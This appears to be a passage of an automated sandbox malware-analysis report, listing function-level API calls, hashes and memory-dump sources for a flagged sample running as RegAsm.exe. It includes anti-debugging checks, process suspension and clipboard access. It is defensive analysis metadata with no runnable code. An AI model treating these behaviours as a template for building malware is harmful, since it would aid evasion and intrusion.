                                          • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                          • Opcode Fuzzy Hash: 3d84d9c70616012fa8221750c6a8410ee04de753accb1628ad2af8c264aec63b
                                          • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                          APIs
                                          • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                            • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                            • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                                            • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?), ref: 004137EC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseCreateInfoParametersSystemValue
                                          • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                          • API String ID: 4127273184-3576401099
                                          • Opcode ID: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                          • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                          • Opcode Fuzzy Hash: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                          • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                          • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                          • String ID: p'E$JD
                                          • API String ID: 1084509184-908320845
                                          • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                          • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                          • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                          • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorInfoLastLocale$_free$_abort
                                          • String ID:
                                          • API String ID: 2829624132-0
                                          • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                          • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                          • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                          • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                          APIs
                                          • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC73
                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                          • String ID:
                                          • API String ID: 3906539128-0
                                          • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                          • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                          • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                          • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                          APIs
                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100061E4
                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 100061F1
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                           • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                          • String ID:
                                          • API String ID: 3906539128-0
                                          • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                          • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                          • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                          • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                          APIs
                                          • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                                          • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                                          • ExitProcess.KERNEL32 ref: 0044338F
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CurrentExitTerminate
                                          • String ID:
                                          • API String ID: 1703294689-0
                                          • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                          • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                          • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                          • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                          APIs
                                          • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                          • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                          • ExitProcess.KERNEL32 ref: 10004AEE
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                           • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Process$CurrentExitTerminate
                                          • String ID:
                                          • API String ID: 1703294689-0
                                          • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                          • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                          • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                          • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Clipboard$CloseDataOpen
                                          • String ID:
                                          • API String ID: 2058664381-0
                                          • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                          • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                          • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                          • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                          APIs
                                          • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041605F,00000000), ref: 0041BBD1
                                          • NtResumeProcess.NTDLL(00000000), ref: 0041BBDE
                                          • CloseHandle.KERNEL32(00000000), ref: 0041BBE7
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CloseHandleOpenResume
                                          • String ID:
                                          • API String ID: 3614150671-0
                                          • Opcode ID: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                          • Instruction ID: 00af7d86c2812e48088786baf9e1e683bef33431c8858657b58e82835f0f92e7
                                          • Opcode Fuzzy Hash: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                          • Instruction Fuzzy Hash: 7AD05E36204121E3C220176A7C0CD97AD68DBC5AA2705412AF804C22609A60CC0186E4
                                          APIs
                                          • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041603A,00000000), ref: 0041BBA5
                                          • NtSuspendProcess.NTDLL(00000000), ref: 0041BBB2
                                          • CloseHandle.KERNEL32(00000000), ref: 0041BBBB
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CloseHandleOpenSuspend
                                          • String ID:
                                          • API String ID: 1999457699-0
                                          • Opcode ID: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                          • Instruction ID: 611eda4fe747f1c58df557fb912083c2b4b70512fbfbfb6239720577e9304ccf
                                          • Opcode Fuzzy Hash: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                          • Instruction Fuzzy Hash: 98D05E36204121E3C7211B6A7C0CD97AD68DFC5AA2705412AF804D26549A20CC0186E4
                                          APIs
                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434CCF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FeaturePresentProcessor
                                          • String ID: MZ@
                                          • API String ID: 2325560087-2978689999
                                          • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                          • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                          • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                          • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: .
                                          • API String ID: 0-248832578
                                          • Opcode ID: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                          • Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
                                          • Opcode Fuzzy Hash: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                          • Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .
                                          • API String ID: 0-248832578
                                          • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                          • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                          • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                          • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                          • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                          • String ID: JD
                                          • API String ID: 1084509184-2669065882
                                          • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                          • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                          • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                          • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID: GetLocaleInfoEx
                                          • API String ID: 2299586839-2904428671
                                          • Opcode ID: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                                          • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                          • Opcode Fuzzy Hash: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                                          • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                                          • String ID:
                                          • API String ID: 1661935332-0
                                          • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                          • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                          • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                          • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$_free$InfoLocale_abort
                                          • String ID:
                                          • API String ID: 1663032902-0
                                          • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                          • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                          • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                          • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$InfoLocale_abort_free
                                          • String ID:
                                          • API String ID: 2692324296-0
                                          • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                          • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                          • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                          • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                          APIs
                                            • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                          • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                          • String ID:
                                          • API String ID: 1272433827-0
                                          • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                          • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                          • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                          • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                          • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                          • String ID:
                                          • API String ID: 1084509184-0
                                          • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                          • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                          • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                          • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                          APIs
